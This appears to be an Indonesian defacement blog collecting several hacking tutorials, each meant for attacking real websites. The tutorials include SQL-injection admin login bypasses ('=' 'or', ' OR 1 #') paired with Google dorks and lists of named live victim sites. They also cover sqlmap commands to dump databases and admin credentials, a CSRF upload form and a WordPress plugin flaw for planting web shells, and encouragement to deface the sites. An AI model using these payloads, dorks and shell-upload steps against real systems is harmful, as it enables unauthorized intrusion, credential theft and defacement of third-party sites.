Deface - Bypass Admin Login "Powered by Ofek Technologies"

Yak lagi lagi dengan saya :v
tidak ada admin lagi selain saya :v
kali ini tutornya sama Bypass lagi karna saya nemunya tutor ini hehehe :v

langsung saja 

===============================================
# Exploit Title: Ofek Technologies Admin Login bypass
# Dorks 1 : "Powered by Ofek Technologies"
# Dorks 2 : "Designed By Ofek Technologies"
# Date: 2017-04-29
# Author: Magelang1337
# Vendor : http://www.ofek.co.in
# Tested on: win 10
===============================================
Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or'
[+] Password: '=' 'or'
===============================================
Admin Page : sitetarget.com/index.php/admin/login.html
===============================================
Demo :
http://www.globalhotelsforsale.com/
http://www.nairswedding.in/
http://www.geovinsolutions.com/
http://www.sja.org.in
http://www.syaa.in
http://www.se7en.co.in/

===============================================
Thanks : | nginxDEX - Vcry - Kerens_id - StuxN3t - Codename - CowoKerensTeam - trenggalek6etar - XaiSyndicate -indoXploit

Sekian :"v

Read More

Deface - Bypass Admin Login "Powered By NetOffica"

Yak kembali lagi dengan saya dan kali ini saya akan membagi sebuah bug yaitu tentang Bypassing Admin Login :"v

Tanpa basa basi langsung saja cmiiw

==================================================
# Exploit Title: NetOffica Admin Login Bypass
# Google Dork: intext:"Powered by NetOffica "
# Date: 2017-04-24
# Author: The Devil (Mohamad Peywasteh)
# Telegram: t.me/afsordeh
# Tested on: win10 64bit
==================================================
Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or'
[+] Password: '=' 'or'
==================================================
[+] Demo Site
[+] http://dicvn.com/admin/login/
[+] http://khonet.com/admin/login/
==================================================

Sekian :"v

Read More

Deface - Sql Injection With Sqlmap (PC Version)

 
Yap balik lagi dengan saya :'v
admin blog yang kece(bur sumur :v)

kali ini saya akan mengasih tutorial tentang Sql Injection With Sqlmap
tanpa basa basi langsung tancap gas mhank :'v

Bahan :

1. Komputer / Laptop
2. Koneksi Internet
3. Python2.7
4. Sqlmap
5. Admin Finder (gapake admin finder nebak juga bisa) | Disini (Under Maintance)
6. Google Dork => Disini | Pass : darkdevil |

Langkah langkah :

1. Buka Terminal
2. Install Python2.7 dahulu commandnya "sudo apt-get install python2.7"
3. Jika sudah download file Sqlmapnya Disini
4. Jika sudah silahkan extract file sqlmap tersebut
5. Lalu buka terminal
6. Ketikkan "cd Downloads/namafilesqlmap"
7. Mari kita cari target dengan Google Dork yang saya kasih
8. Jika sudah, ketikkan di Terminal "python sqlmap.py -u http://www.situs.co.li/index.php?id=69 --dbs"

 

9. Tunggu sampai keliatan list Database nya seperti ini
10. Lalu ketikkan "sqlmap.py -u http://TARGET.com -D nama_database -tables"

 

11. Kan ada tuh table databasenya kan ? coba ketikkan "sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns" untuk melihat columns dari tables tersebut

12. Nah sekarang ketikkan "sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump" untuk melihat isinya

13. Nah kan ada kan user|pass adminnya hehe :D ingat password admin biasanya harus di hash dulu agar bisa login di admin loginnya :)
14. Silahkan cari admin loginnya dari Admin Finder tersebut
15. Dan silahkan eksekusi sepuas klean

Note :
- Kalo mau nebas backup index orinya ya gan, jadi admin itu susah lo ya :D
- Maaf saya lagi gadapet target makanya ngambil ss orang :"v

sekian :D

Read More

Tutorial Install Sqlmap Di Termux (Android)

Yap balik lagi dengan admin ganteng satu ini :"v

kali ini saya akan upload tutorial Installing Sqlmap in Termux Android (cuih keminggris :v)

langsung saja tanpa basa basi nanti kalo kelamaan gaenak soalnya wkwkwk

Bahan :

1. Yang pasti Hp Android (Versi OS Minimum 5.1)

2. Koneksi Internet

3. Aplikasi Termux

Langkah langkah :

1. Download dulu aplikasi Termux Disini

2. Jika sudah buka Aplikasi Termux dan ketikkan apt-get update

3. Lalu install python2 dengan command "packages install python2"

4. Install git dengan command "packages install git"

5. Clone Sqlmapnya dari link ini https://github.com/sqlmapproject/sqlmap.git commandnya "git clone https://github.com/sqlmapproject/sqlmap.git"

6. Tunggu hingga proses install packages selesai

7. Pindah ke Directory sqlmapnya dengan command "cd sqlmap"

8. Lalu ketikkan "python2 sqlmap.py"

9. Jika sqlmap sudah terinstall maka akan muncul tulisan seperti gambar dibawah ini :D

 

yap itu saja terima kasih :D
sering share" tentang postingan di blog saya yah xD

Read More

Deface - Uploadify Vulnerability Upload Shell

 

 

Bahan-Bahan :

1. PC/Laptop
2. Koneksi Internet
3. CSRF
4. Dork
5. Shell (kalo blm punya cari di gugel)

  Gapake lama langsung tancap gass mhank :v

Dork : inurl:/uploadify/ intitle:index of    (silahkan dikembangin sendiri biar dapet web yang vuln)

CSRF : 

<form method="post" action="urltarget">
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Tusbol">
</form>

 

Tutorial :

1. Copy CSRF di atas lalu save dengan format .html 

2. Dorking

3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)

4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)

5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)

6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php

7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php

8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya

Maaf kalau ada kesalahan di dalam tutor ini :)

Source : Garuda Security Hacker

Read More

Deface - Wordpress Mangboard Plugins File Upload Vulnerability

Hokya kali ini gw mau sharing tutor lagi nih xD
tanpa basa basi dan menunggu lama langsung saja cekidot xD ~


# Exploit Tittle            : Wordpress Mangboard Plugins File Upload Vulnerability

# Google Dork            : inurl:wp-content/plugins/mangboard/

# Date                         : 16-04-2017

# Exploit Author         : Isal Dot ID

# Vendor Homepage   : https://srd.wordpress.org/plugins/mangboard/

# Version                    : webapps

# Tested on                 : Windows 7


1. Description

    You can upload files without acces as author

2. Proof Of Concept

    Disini

3. Path Shell

    /wp-content/uploads/mangboard/years/month/random
    nomor/random_yourshell.php.gif



Greetz : Strlen - Jje Incovers - ReC0ded - Pak Haxor - Ice-cream - Panataran - ex-Sh1Ne - Malaikat_Galau - ViruzTomcat - AdrElite - Wonka  - Sh0uT0u7 - l0c4lh34rtz - Zombie-Root - KONSLET

Thanks To : Sanjungan Jiwa Team - Indonesian Defacer Tersakiti - Jembut Loyality - IndoXploit - Suram Crew - Extreme Crew - Bahari Trouble Maker - Indonesian People

Source : Isal Dot Id :D

Read More

Deface - Bypass Admin Login "Powered By Nusiorung"

Google Dork:  intext:"Powered By Nusiorung"

Login Dengan Username & Password
Username : ' OR 1 #
Password : ' OR 1 #

Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.

Setelah itu, klik kotak pada bagian bawah

Langsung upload shell kita disini

Jika Sudah, kalian akan melihat shell kalian seperti ini, di dalam list document tadi

( Yang dilingkari merah adalah nama file shell backdoor anda )

Selanjutnya, letak shell kalian ada di:

-> /admin/document/upload/shell.php

Contoh: http://target.com/admin/document/upload/YJE6ZH.php

Live Target: 

http://edu.nmc.ac.th/th/admin/

Oke, Sekian Dulu Tutorial nya, Silakan kalian kembangi lagi.

Source : IndoXploit Coders Team

Read More